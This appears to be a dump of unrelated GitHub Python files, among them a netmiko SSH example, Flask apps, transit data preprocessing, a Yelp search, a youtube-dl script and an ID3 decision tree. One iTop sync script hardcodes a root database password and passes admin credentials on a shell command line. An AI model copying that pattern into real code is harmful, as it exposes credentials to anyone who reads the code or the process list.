EXIT\")\r\n","repo_name":"BenjaminDay/Reddit-Discord-API-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34058259950","text":"#!/usr/bin/env python\nfrom netmiko import ConnectHandler\n\nkey_file = \"~/.ssh/test_rsa\"\ncisco1 = {\n \"device_type\": \"cisco_ios\",\n \"host\": \"cisco1.lasthop.io\",\n \"username\": \"testuser\",\n \"use_keys\": True,\n \"key_file\": key_file,\n}\n\nwith ConnectHandler(**cisco1) as net_connect:\n output = net_connect.send_command(\"show ip arp\")\n\nprint(f\"\\n{output}\\n\")\n","repo_name":"ktbyers/netmiko","sub_path":"examples/conn_ssh_keys.py","file_name":"conn_ssh_keys.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":3278,"dataset":"github-code","pt":"21"} +{"seq_id":"34593002186","text":"'''Exception handling'''\r\n\r\na = int(input(\"enter the numerator: \"))\r\nb = int(input(\"enter the denominator: \"))\r\n\r\nc = None\r\n\r\ntry:\r\n print(\"Resource open.\")\r\n c = a/b\r\nexcept ZeroDivisionError as e:\r\n\tprint(\"Sorry, can't perform division - \",e)\r\nexcept ValueError as e:\r\n\tprint(\"Sorry, can't perform division - \",e)\r\nexcept Exception as e:\r\n\tprint(\"Sorry, can't perform division - \",e)\r\nfinally:\r\n print(\"Resource closed.\")\r\n\t\r\nprint(\"The value of c is {}\".format(c))","repo_name":"KaProDes/python3","sub_path":"Tutorial/tut52.py","file_name":"tut52.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40756876262","text":"from sqlalchemy import create_engine\nimport re\nfrom pandas import Series, DataFrame, concat\nimport pandas as pd\nfrom pymongo import MongoClient\nimport subprocess as t\nimport logging\nfrom logging.config import fileConfig\nimport configparser\n\nfileConfig('logger_config.ini')\nlogger=logging.getLogger('infoLogger')\n\nclass LoadHyper():\n\n def __init__(self):\n self.cfg = configparser.ConfigParser()\n self.cfg.read(\"config.ini\") \n cmdb_db = self.cfg.get(\"cmdb\",\"db\")\n cmdb_str = self.cfg.get(\"cmdb\",\"conn_str\")\n self.client = MongoClient(cmdb_str)\n self.db = self.client[cmdb_db]\n \n self.engine = create_engine(\n \"mysql+pymysql://root:Password1@127.0.0.1:3306/itop?charset=utf8\", encoding=\"utf-8\", echo=False)\n\n def load_to_itopdb(self, df, source_table_name):\n self.engine.execute(\"delete from %s\" % source_table_name)\n df.to_sql(source_table_name, con=self.engine,\n if_exists='append', index=False)\n\n def apply_by_php(self, source_table_name):\n source_table_id = source_table_name.split('_').pop()\n php_cmd = \"php -q /itop_data/http_dir/itop/synchro/synchro_exec.php --auth_user=%s --auth_pwd=%s --data_sources=%s\" % (\n 'admin', 'Password1', source_table_id)\n output = t.getoutput(php_cmd)\n logger.info(output + \"\\n\")\n\n def get_hyper_src_df(self,table_name):\n get_ps_sql = \"select id as 'server_id',name,environment from %s\" % (table_name)\n ps_df = pd.read_sql(get_ps_sql, con=self.engine).assign(join_name=lambda x:x['name'])\n vc_server_coll = self.db['vcenter_server']\n vc_server_df = pd.DataFrame(list(vc_server_coll.find())).assign(join_name=lambda x:x['vc_name'])\n vc_server_df['join_name'] = vc_server_df['join_name'].map(lambda x:str(x).lower().split('.cargosmart.com')[0])\n hyper_src_df = pd.merge(vc_server_df, ps_df, left_on='join_name', 
right_on='join_name', how='left').assign(primary_key=lambda x:x['name']).assign(org_id=lambda x:1)[['server_id','name','primary_key','org_id','environment']]\n # logger.info(hyper_src_df)\n return hyper_src_df\n\n\n def main(self):\n hyper_source_table = 'synchro_data_hypervisor_83'\n hyper_src_df = self.get_hyper_src_df(table_name='view_PhysicalServer')\n self.load_to_itopdb(df=hyper_src_df, source_table_name=hyper_source_table)\n self.apply_by_php(source_table_name=hyper_source_table)\n\nif __name__ == '__main__':\n hyper = LoadHyper()\n hyper.main()\n\n","repo_name":"yyztc/itop","sub_path":"load_hypervisor.py","file_name":"load_hypervisor.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10084565609","text":"import os\r\n\r\ndef writeTo(state,flag,f):\r\n if(flag == 'start'):\r\n f.writelines(\"Downloading the \"+state + \"......\")\r\n elif(flag == \"end\"):\r\n f.writelines(\"Complete.\")\r\n\r\ndef progress(repo,state,flag):\r\n file = \"public/data/\" + repo + \"/progress\"\r\n\r\n if(state == 'analyze'):\r\n with open(file,'a') as f:\r\n if(flag == 'start'):\r\n f.writelines(\"\\nAnalyzing the details......\")\r\n elif(flag == \"end\"):\r\n f.writelines(\"Complete.\")\r\n if(state == 'commits'):\r\n with open(file,'a') as f:\r\n writeTo(state, flag, f)\r\n if(state == 'issues'):\r\n with open(file,'a') as f:\r\n if(flag == \"start\"):\r\n f.writelines(\"\\n\")\r\n writeTo(state, flag, f)\r\n if(state == 'comments'):\r\n with open(file,'a') as f:\r\n if(flag == \"start\"):\r\n f.writelines(\"\\n\")\r\n writeTo(state, flag, f)\r\n'''\r\nitems=[\"commits\",\"issues\",\"comments\",\"analyze\"]\r\nrepo = \"nlohmann/json\"\r\nfor item in items:\r\n progress(repo,item,\"start\")\r\n progress(repo,item,\"end\")\r\n'''\r\n","repo_name":"jiangsha1007/repoHealth","sub_path":"github/py_code/progress.py","file_name":"progress.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20356960063","text":"from flask import render_template\nfrom app import app\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n\tuser = {\n\t\t\t'username': 'Hin',\n\t\t\t'age': '33',\n\t\t\t}\n\treturn render_template('index.html', title='Сервис для работы', user=user)\n","repo_name":"Hinahin/OnlineStudy","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42226990932","text":"# -*- coding: UTF-8 -*-\n\"\"\"\n:Script: line_ang_azim.py\n:Author: Dan.Patterson@carleton.ca\n:Modified: 2016-12-21\n:\n:Purpose:\n:\n:Functions: help() for help\n:---------\n: _demo - This function ...\n:\n:Notes:\n: see help topic: np.info(np.arctan2)\n: np.arctan2(dy, dx) is the format which differs from excel\n: dx, dy - the differences in the respective coordinates x and y\n: 360 = 2*np.pi, aka the circle in radians\n:Results:\n:------- x-axis compass azim\n: orig: [0, 0]: dest: [-1, 1] line_dir: 135.0 NW 315\n: orig: [0, 0]: dest: [0, 1] line_dir: 90.0 N 0, 360\n: orig: [0, 0]: dest: [1, 1] line_dir: 45.0 NE 45\n: orig: [0, 0]: dest: [1, 0] line_dir: 0.0 E 90\n: orig: [0, 0]: dest: [1, -1] line_dir: -45.0 SE 135\n: orig: [0, 0]: dest: [0, -1] line_dir: -90.0 S 180\n: orig: [0, 0]: dest: [-1, -1] line_dir: -135.0 SW 225\n: orig: [0, 0]: dest: [-1, 0] line_dir: 180.0 W 
270\n:\n:References:\n:\n:---------------------------------------------------------------------:\n\"\"\"\n# ---- imports, formats, constants ----\n\nimport sys\nimport numpy as np\n\nft = {'bool': lambda x: repr(x.astype('int32')),\n 'float': '{: 0.3f}'.format}\nnp.set_printoptions(edgeitems=10, linewidth=80, precision=2,\n suppress=True, threshold=100,\n formatter=ft)\nnp.ma.masked_print_option.set_display('-')\n\nscript = sys.argv[0]\n\n# ---- functions ----\n\n\ndef line_dir(orig, dest, fromNorth=False):\n \"\"\"Direction of a line given 2 points\n\n `orig`, `dest` : point coordinates\n Two points representing the start and end of a line.\n `fromNorth` : boolean\n True or False gives angle relative to x-axis)\n \"\"\"\n orig = np.atleast_2d(orig)\n dest = np.atleast_2d(dest)\n dxy = dest - orig\n ang = np.degrees(np.arctan2(dxy[:, 1], dxy[:, 0]))\n if fromNorth:\n ang = np.mod((450.0 - ang), 360.)\n return ang\n\n\ndef _demo(xc=0, yc=0, fromNorth=True):\n \"\"\" run the demo with the data below \"\"\"\n p0 = np.array([xc, yc]) # origin point\n p1 = p0 + [-1, 1] # NW\n p2 = p0 + [0, 1] # N\n p3 = p0 + [1, 1] # NE\n p4 = p0 + [1, 0] # E\n p5 = p0 + [1, -1] # SE\n p6 = p0 + [0, -1] # S\n p7 = p0 + [-1, -1] # SW\n p8 = p0 + [-1, 0] # W\n #\n od = [[p0, p1], [p0, p2], [p0, p3], [p0, p4],\n [p0, p5], [p0, p6], [p0, p7], [p0, p8]]\n for pair in od:\n orig, dest = pair\n ang = line_dir(orig, dest, fromNorth=fromNorth)\n if fromNorth:\n dir = \"From N.\"\n else:\n dir = \"From x-axis\"\n args = [orig, dest, dir, ang]\n print(\"orig: {}: dest: {!s:<8} {}: {!s:>6}\".format(*args))\n return od\n\n\n# ---------------------------------------------------------------------\nif __name__ == \"__main__\":\n \"\"\"Main section... \"\"\"\n# print(\"Script... {}\".format(script))\n xc = 0 # 300000 # pick an origin x 0 or 300000 for example\n yc = 0 # 5025000 # pick an origin y 0 or 5025000\n od = _demo(xc, yc, fromNorth=True)\n","repo_name":"Dan-Patterson/arraytools","sub_path":"arraytools/analysis/line_ang_azim.py","file_name":"line_ang_azim.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"31903970587","text":"\"\"\"\nThis file processes the raw CSVs downloaded in make_dataset.py for a specific transportation system.\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom transit_data import BRTData, NTDData\nimport os\n\n# --------------------------------------------\n# HELPER FUNCTIONS\n# --------------------------------------------\n\ndef make_average(df, name) -> pd.Series:\n series_average = df.mean(axis=1)\n series_average.rename(name, inplace=True)\n\n return series_average\n\ndef export_csv(df, name) -> None:\n script_dir = os.path.dirname(os.path.abspath(__file__))\n project_dir = os.path.abspath(os.path.join(script_dir, \"../..\"))\n data_dir = os.path.join(project_dir, \"data/processed\")\n \n df.to_csv(os.path.join(data_dir, f'{name}.csv'), index=True)\n\n# --------------------------------------------\n# DATA PROCESSING FUNCTIONS\n# --------------------------------------------\n\ndef process_brt_data(brt_data: BRTData) -> pd.DataFrame:\n \"\"\"\n Clean and process BRTData for various metrics and return a pandas DataFrame of the resulting average values.\n\n Parameters:\n brt_data (BRTData): BRTData object to process.\n\n Returns:\n pandas.Dataframe: A pandas DataFrame of the resulting average values for each metric.\n \"\"\"\n metrics = ['income', 'pop', 
'age', 'house_married', 'house_nonfam', 'house_m_single', 'house_f_single', 'car', 'biz']\n series_list = []\n\n for metric in metrics:\n df = brt_data.get_data(metric)\n \n # Cleaning\n df.dropna(axis=1, how='all', inplace=True) # drop cols with all NaN's\n df = df.loc[:, ~(df < 0).any(axis=0)] # drop cols that feature any negative\n df = df.loc[:, df.eq(0).mean() <= 0.25] # only keep cols with 25% or fewer values that are still 0\n\n series_average = make_average(df, metric)\n series_list.append(series_average)\n\n return pd.concat(series_list, axis=1)\n\n\ndef process_ntd_data(ntd_data: NTDData, system: str) -> pd.DataFrame:\n \"\"\"\n Clean and process NTDData and return a pandas DataFrame of the resulting values for a specific system.\n\n Parameters:\n ntd_data (NTDData): An object containing NTD data.\n system (str): A string representing the transit system for which data is being processed.\n \n Return type:\n pandas.DataFrame: A cleaned DataFrame containing summarized and filtered data for the specified system.\n \"\"\"\n\n ids = {\n # 'brooklyn': '2008',\n 'los_angeles': '9154',\n 'boston': '1003',\n 'houston': '6008',\n 'orlando': '4035',\n 'cleveland': '5015',\n 'richmond': '3006',\n 'kansas': '7005',\n 'grand_rapids': '5033',\n 'hartford': '1048',\n 'eugene': '7',\n 'indianapolis': '5050',\n 'albuquerque': '6019',\n 'aspen_westcliffe_glenwood_springs': '8R01-013',\n 'fort_collins': '8011'\n }\n \n years = list(range(2013, 2021))\n cols = ['Unlinked Passenger Trips', 'Primary UZA\\n Population', 'UZA Population', 'Mode VOMS', 'VOMS', 'Annual Vehicle Revenue Miles', 'Vehicle Revenue Miles']\n res_df = pd.DataFrame(columns = cols, index = years)\n\n for year in years:\n df_raw = ntd_data.get_data(f'transit_data_{year}_filtered')\n \n if year == 2013:\n df_raw = df_raw.fillna(0)\n df_raw['ID'] = df_raw['ID'].astype(int).astype(str)\n filtered_df = df_raw[df_raw[\"ID\"].astype(str) == ids[system]]\n elif year == 2014:\n filtered_df = df_raw[df_raw[\"Legacy NTDID\"].astype(str) == ids[system]]\n else: \n filtered_df = df_raw[df_raw[\"Legacy NTD ID\"].astype(str) == ids[system]]\n \n df_year = filtered_df.loc[:, filtered_df.columns.isin(cols)] \n\n # Populate res_df\n for col in cols:\n try:\n res_df.at[year, col] = df_year[col][0]\n except:\n res_df.at[year, col] = np.NaN\n\n res_df.rename(columns={'Primary UZA\\n Population': 'Primary UZA Population'}, inplace=True)\n\n # Merge duplicate cols\n res_df['UZA Population'].update(res_df.pop('Primary UZA Population'))\n res_df['VOMS'].update(res_df.pop('Mode VOMS'))\n res_df['Vehicle Revenue Miles'].update(res_df.pop('Annual Vehicle Revenue Miles'))\n\n # Column name cleaning - lowercase and space replacement\n res_df.columns= res_df.columns.str.lower()\n res_df.columns = res_df.columns.str.replace(' ', '_')\n\n # Cleaning values - removing commas from float fields that are mis-cast\n res_df.replace(',','', regex=True, inplace=True)\n res_df = res_df.astype({'unlinked_passenger_trips':'float'})\n res_df = res_df.astype({'uza_population':'float'})\n res_df = res_df.astype({'vehicle_revenue_miles':'float'})\n\n # Adjusting values off by 3 orders of magnitude somehow\n mean = res_df.mean()\n std = res_df.std()\n\n # Handling edge cases\n if system in ('cleveland', 'orlando'):\n res_df.loc[(abs(mean.unlinked_passenger_trips - res_df['unlinked_passenger_trips']) > std.unlinked_passenger_trips) & (res_df.index < 2015), 'unlinked_passenger_trips'] *= 1000\n res_df.loc[(abs(mean.vehicle_revenue_miles - res_df['vehicle_revenue_miles']) > 
std.vehicle_revenue_miles) & (res_df.index < 2015), 'vehicle_revenue_miles'] *= 1000\n\n elif system not in ('aspen_westcliffe_glenwood_springs', 'hartford', 'richmond'):\n res_df.loc[abs(mean.unlinked_passenger_trips - res_df['unlinked_passenger_trips']) > std.unlinked_passenger_trips, 'unlinked_passenger_trips'] *= 1000\n res_df.loc[abs(mean.vehicle_revenue_miles - res_df['vehicle_revenue_miles']) > std.vehicle_revenue_miles, 'vehicle_revenue_miles'] *= 1000\n\n return res_df\n\ndef process_data(brt_data: BRTData, ntd_data: NTDData, system: str) -> None:\n \"\"\"\n Process BRTData and NTDData and merge the results into a dataframe. Export the merged dataframe to a CSV file.\n\n Args:\n brt_data (BRTData): the BRTData object containing the data to process.\n ntd_data (NTDData): the NTDData object containing the data to process.\n system (str): the name of the transit system to process. Used to filter NTD data.\n\n Returns:\n None. The function writes the merged dataframe to a CSV file.\n \"\"\"\n brt_df = process_brt_data(brt_data)\n ntd_df = process_ntd_data(ntd_data, system)\n\n # Merge the dfs\n merged_df = pd.concat([brt_df, ntd_df], axis=1)\n merged_df = merged_df.round(2)\n merged_df.insert(0, 'system', system)\n\n # Export the df to a CSV\n export_csv(merged_df, system)\n\ndef main():\n locations = ['cleveland', 'houston', 'kansas', 'richmond', 'indianapolis', 'eugene', 'albuquerque', 'aspen_westcliffe_glenwood_springs', 'fort_collins', 'hartford', 'grand_rapids', 'orlando', 'boston', 'los_angeles']\n ntd = NTDData()\n ntd.load_existing_data()\n \n for system in locations:\n brt = BRTData(system)\n brt.load_existing_data()\n process_data(brt, ntd, system)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"hudyu17/transit-model","sub_path":"model/src/data/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":7027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41164255321","text":"import requests\nimport json\n\n'''\nddress, an image if available, star rating, review count, and link to the Yelp page.\n\n'''\n\ndef search(location):\n api_key=''\n headers = {'Authorization': 'Bearer %s' % api_key}\n\n url='https://api.yelp.com/v3/businesses/search'\n\n params = {'term':'parking','location': location}\n req = requests.get(url, params=params, headers=headers)\n\n # printing the text from the response\n results = json.loads(req.text)\n businesses = results['businesses']\n businesses = sorted(businesses, key = lambda i:i['rating'])\n ret = []\n for b in businesses:\n id = b['id']\n address = b['location']\n image = b['image_url']\n rating = b['rating']\n reviews = b['review_count']\n yelp_link = b['url']\n #score = ( number of reviews * rating ) / (number of reviews + 1)\n score = (int(reviews) * int(rating)) / (reviews + 1)\n ret.append({'score':score, 'address':address, 'image':image, 'rating': rating, 'reviews':reviews, 'yelp_link':yelp_link})\n\n return ret\n\nsearch('Los Angeles')\n","repo_name":"n0remac/LowestRatedParkingLot","sub_path":"ratings/get_lots.py","file_name":"get_lots.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39328214743","text":"from __future__ import unicode_literals\nimport pandas\nimport youtube_dl\n\nin_file = \"D:\\TREASURE\\Music\\carnatic_lesson.xlsx\"\n\nvocal_df = pandas.read_excel(in_file, \"VOCAL\")\nflute_df = pandas.read_excel(in_file, 
\"FLUTE\")\n\nfor index, row in vocal_df.iterrows():\n    url = row[\"Youtube Link\"]\n    # print (row[\"Youtube Link\"])\n    outtemplate = str(index + 1) + \"-VOCAL\" + \"-%(title)s.%(ext)s\"\n    ydl_opts = {\n        'outtmpl': outtemplate\n    }\n    # print (outtemplate)\n    with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n        ydl.download([url])\n\n\n\n# help(youtube_dl)","repo_name":"VINEET277/scriptsRef1","sub_path":"scriptsRef_One/jCodes-master/codeSnippets-master/youtube-dl-pandas.py","file_name":"youtube-dl-pandas.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13357967340","text":"# coding: utf-8 \nimport operator\nimport json\nclass commonUtil:\n\t\n\tdef is_contain(self, str_one, str_two):\n\t\t'''\n\t\tCheck whether one string is contained in another.\n\t\tstr_one: the string to search for\n\t\tstr_two: the string to be searched\n\t\t'''\n\t\tflag = None\n\t\tif str_one in str_two:\n\t\t\tflag = True\n\t\telse:\n\t\t\tflag = False\n\t\treturn flag\n\n\n\tdef is_equal(self, dict_one, dict_two):\n\t\t'''\n\t\tCheck whether two dictionaries are equal.\n\t\t'''\n\t\tif isinstance(dict_one, str):\n\t\t\tdict_one = json.loads(dict_one)\n\t\tif isinstance(dict_two, str):\n\t\t\tdict_two = json.loads(dict_two)\n\t\tresult = operator.eq(dict_one, dict_two)\n\t\treturn result\n\nif __name__ == '__main__':\n\ta = {\n\t\t\"name\":\"guan\",\n\t\t\"age\":\"25\"\n\t}\n\tb = {\n\t\t\"name\":\"guan\",\n\t\t\"age\":\"25\"\n\t}\n\tcom = commonUtil()\n\tc = com.is_equal(a,b)\n\tprint(c)\n","repo_name":"Torres-guan/Mytest","sub_path":"Util/common_util.py","file_name":"common_util.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24211105900","text":"#\n# [163] Missing Ranges\n#\n# https://leetcode.com/problems/missing-ranges\n#\n# algorithms\n# Medium (23.84%)\n# Total Accepted:    32.5K\n# Total Submissions: 136.1K\n# Testcase Example:  '[0,1,3,50,75]\\n0\\n99'\n#\n#\n# Given a sorted integer array where the range of elements are in the inclusive\n# range [lower, upper], return its missing ranges.\n#\n#\n# For example, given [0, 1, 3, 50, 75], lower = 0 and upper = 99, return [\"2\",\n# \"4->49\", \"51->74\", \"76->99\"].\n#\n#\n\nclass Solution(object):\n    def findMissingRanges(self, nums, lower, upper):\n        \"\"\"\n        :type nums: List[int]\n        :type lower: int\n        :type upper: int\n        :rtype: List[str]\n        \"\"\"\n        res = []\n        nums.append(upper+1)\n        p = lower\n        for num in nums:\n            if num > p:\n                if num == p+1:\n                    res.append(str(p))\n                else:\n                    res.append(\"->\".join([str(p), str(num-1)]))\n            p = num+1\n        return res\n\n","repo_name":"Iverance/leetcode","sub_path":"163.missing-ranges.py","file_name":"163.missing-ranges.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"86745920447","text":"import subprocess\nfrom typing import List, Optional, Callable, Union\n\n\ndef collect_output_from_command(\n    command: Union[List[str], str],\n    stdout: Optional[Callable[[str], None]] = None,\n    stderr: Optional[Callable[[str], None]] = None,\n    shell=False,\n) -> str:\n    p = subprocess.Popen(\n        command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=shell\n    )\n\n    outs, errs = p.communicate(timeout=15)\n    outs, errs = outs.decode(), errs.decode()\n    if stderr is not None:\n        for e in errs.splitlines():\n            if e:\n                stderr(e)\n    if stdout is not None:\n        for o in outs.split():\n            stdout(o)\n\n    rc = p.poll()\n    if rc is not None and rc > 0:\n        # failed :(\n        jc = 
command\n if shell and isinstance(jc, list):\n jc = \" \".join(f\"'{c}'\" for c in command)\n\n lastlines = errs[: min(len(errs) - 1, 100)]\n if isinstance(lastlines, list):\n lastlines = \"\".join(lastlines)\n raise Exception(\n f'Failed to call command (rc={rc}) {jc}, first 100 characters of stderr:\\n \"{lastlines}\"'\n )\n\n return outs\n","repo_name":"PMCC-BioinformaticsCore/janis-assistant","sub_path":"janis_assistant/utils/callprogram.py","file_name":"callprogram.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"9147157096","text":"from flask import Blueprint, render_template, request, url_for\nfrom fuzzywuzzy import fuzz\n\nfrom models import db, Phone, PhoneShop, Shop, normalize_name\nfrom webapp.config import ITEMS_PER_PAGE\n\nblueprint = Blueprint('main', __name__)\n\n\n@blueprint.route('/')\n@blueprint.route('/index')\ndef index():\n title = 'Смартфоны'\n text = request.args.get('search')\n how = request.args.get('how')\n nothing_found = True\n\n if text:\n if how == 'pop':\n all_phones = Phone.query.order_by(Phone.views).all()\n else:\n all_phones = Phone.query.all()\n phones = []\n for phone in all_phones:\n ratio1 = fuzz.partial_ratio(normalize_name(phone.name), text)\n ratio2 = fuzz.token_set_ratio(normalize_name(phone.name), text)\n if ratio1 + ratio2 == 200:\n phones = [phone]\n break\n if ratio1 + ratio2 > 150:\n phones.append([phone, ratio1 + ratio2])\n if len(phones) > 1:\n phones = [i[0] for i in sorted(phones, key=lambda x: x[1], reverse=True)]\n if phones:\n nothing_found = False\n return render_template('main/index.html', page_title=title, phones=get_prices(phones),\n nothing_found=nothing_found)\n\n nothing_found = False\n page = request.args.get('page', 1, type=int)\n if how == 'pop':\n phones = Phone.query.order_by(Phone.views.desc()).paginate(page, ITEMS_PER_PAGE, False)\n elif how == 'price':\n phones = db.session.query(PhoneShop.phone_id, db.func.min(PhoneShop.price).label('min_price')) \\\n .group_by(PhoneShop.phone_id, PhoneShop.price).order_by(PhoneShop.price.desc()) \\\n .paginate(page, ITEMS_PER_PAGE, False)\n else:\n phones = Phone.query.paginate(page, ITEMS_PER_PAGE, False)\n next_url = url_for('main.index', page=phones.next_num) if phones.has_next else None\n prev_url = url_for('main.index', page=phones.prev_num) if phones.has_prev else None\n if how == 'price':\n phones_price_sorted = {}\n for item in phones.items:\n phones_price_sorted[Phone.query.filter_by(id=item.phone_id).first()] = round(item.min_price)\n phones = phones_price_sorted\n else:\n phones = get_prices(phones.items)\n\n return render_template('main/index.html', page_title=title, phones=phones,\n nothing_found=nothing_found, next_url=next_url, prev_url=prev_url, how=how)\n\n\ndef get_prices(phones):\n \"\"\" Функция формирует словарь {телефон: минимальная_цена} для последующего вывода в шаблоне\"\"\"\n\n out = {}\n for phone in phones:\n prices = [round(shop.price) for shop in phone.shops if shop.price]\n out[phone] = str(min(prices)) if prices else None\n return out\n\n\n@blueprint.route('/specs')\ndef show_specs():\n phone_id = request.args.get('phone_id', None)\n phone = Phone.query.filter_by(id=phone_id).first()\n if not phone:\n return render_template('errors/404.html')\n views = 1 if not phone.views else phone.views + 1\n Phone.query.filter_by(id=phone.id).update({'views': views})\n db.session.commit()\n price_queries = PhoneShop.query.filter_by(phone_id=phone_id).all()\n 
prices = []\n    for query in price_queries:\n        shop = Shop.query.filter_by(id=query.shop_id).first()\n        if not query.price:\n            continue\n        price = str(round(query.price))\n        price = price[:len(price) - 3] + ' ' + price[-3:]\n        shop_name = shop.name\n        url = shop.phones_path + query.external_id\n        prices.append([shop_name, price, url])\n    if not prices:\n        prices = [[], [], []]\n    return render_template('main/specs.html', phone=phone, prices=prices, page_title=phone.name)\n\n\n@blueprint.route('/about')\ndef about():\n    return render_template('main/about.html')\n","repo_name":"borshchevsky/stuff_finder","sub_path":"webapp/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32321816530","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport random\nfrom sklearn import utils\n\n\nclass Arbol(object):\n    \n    def __init__(self):\n        self.Ramas = []\n        self.valor = None\n\n'Function that returns True if the tree (Arbol) is a leaf'\ndef EsHoja(Arbol):\n    return (len(Arbol.Ramas)==0)\n\n\n'Function to compute entropy'\ndef Entropia(ColOutput): \n    Valores, ocurrencias = np.unique(ColOutput,return_counts = True)\n    CantTotal = np.sum(ocurrencias)\n    E = 0\n    #iterate over the possible output values\n    for indice in range(len(Valores)):\n        P_X = ocurrencias[indice]/CantTotal\n        E += - P_X*np.log2(P_X)\n    return E\n\n\n'Function to compute the summation term of the Information Gain'\ndef IGAux(Datos, atributo): \n    Valores, ocurrencias = np.unique(Datos[atributo],return_counts = True)\n    CantTotal = np.sum(ocurrencias)\n    IGAux = 0\n    \n    for indice in range(len(Valores)):\n        #keep only the rows whose value of the attribute is Valores[indice] and count the records\n        mask = Datos[atributo].to_numpy() == Valores[indice]\n        Datos_con_atributoValor = Datos.loc[mask]\n        CantAt = ocurrencias[indice]\n        #update IGAux\n        IGAux += (CantAt/CantTotal)*Entropia(Datos_con_atributoValor['output'])\n\n    return IGAux\n\n\n\"\"\"Function to compute the possible values of the attributes.\nReturns a list of arrays where each array contains the possible values of the attribute at that index\"\"\"\ndef ValsAtributos(Datos, Atributos):\n    ValsAtrib = []\n    for indice in range(len(Atributos)):\n        Valores = np.unique(Datos[Atributos[indice]])\n        ValsAtrib.insert(indice, Valores)\n    return ValsAtrib \n
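\n# Worked check added for clarity (not part of the original script): a balanced\n# binary output column has an entropy of exactly 1 bit, since -2*(0.5*np.log2(0.5)) == 1.0.\n#\n# assert abs(Entropia(np.array([0, 1, 0, 1])) - 1.0) < 1e-12\n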
\n    #prune if there are fewer than 10 examples\n    elif (len(Atributos)==0) or (Datos.shape[0]<10):\n        Arb.valor = Valores[np.argmax(ocurrencias)]\n    \n    else:\n        #randomly choose maxAtributos indices within the range of len(Atributos)\n        if (len(Atributos)> maxAtributos):\n            arraysubset = np.array(random.sample(list(range(len(Atributos))), maxAtributos))\n            sbsetAtributos = [Atributos[i] for i in arraysubset]\n            subsetValoresAtributos = [ValsAtributos[i] for i in arraysubset]\n        else:\n            sbsetAtributos = Atributos\n            subsetValoresAtributos = ValsAtributos\n        \n        #select the best attribute\n        E = Entropia(Datos[targetAttribute])\n        IG_AuxAtributos = [(E-IGAux(Datos,at)) for at in sbsetAtributos] #IG of every attribute in sbsetAtributos\n        Atributo_indice = np.argmax(IG_AuxAtributos)\n        Atributo = sbsetAtributos[Atributo_indice]\n        \n        # if no attribute yields any gain, prune (IG_AuxAtributos already holds the gain E-IGAux,\n        # so the test must be gain == 0, not E - gain == 0 as before)\n        if(IG_AuxAtributos[Atributo_indice]==0):\n            Arb.valor = Valores[np.argmax(ocurrencias)]\n        else:\n            \n            #place Atributo at the root \n            Arb.valor = Atributo\n            \n            #Array with the values of Atributo. \n            ValoresAtributoAux = np.array(subsetValoresAtributos[Atributo_indice], copy=True) \n            \n            #get the index of Atributo in Atributos\n            indice = Atributos.index(Atributo) \n            #remove the attribute from the list\n            del Atributos[indice]\n            del ValsAtributos[indice]\n            \n            #grow the tree, iterating over every possible value of the attribute\n            for i in range(len(ValoresAtributoAux)):\n                val = ValoresAtributoAux[i]\n                Ejemplos = Datos.loc[Datos[Atributo] == val]\n                \n                # if there are no examples with that value, add a leaf with the most common value of the target attribute for the data.  \n                if (len(Ejemplos)==0):\n                    Hoja = Arbol()\n                    Hoja.valor = Valores[np.argmax(ocurrencias)]\n                    Arb.Ramas.insert(i,Hoja)\n                #otherwise, recurse\n                else:\n                    Arb.Ramas.insert(i, ID3(Ejemplos, targetAttribute, Atributos, ValsAtributos, maxAtributos)) \n    return Arb\n\n\n\"\"\" Function that evaluates an instance on the decision tree. 
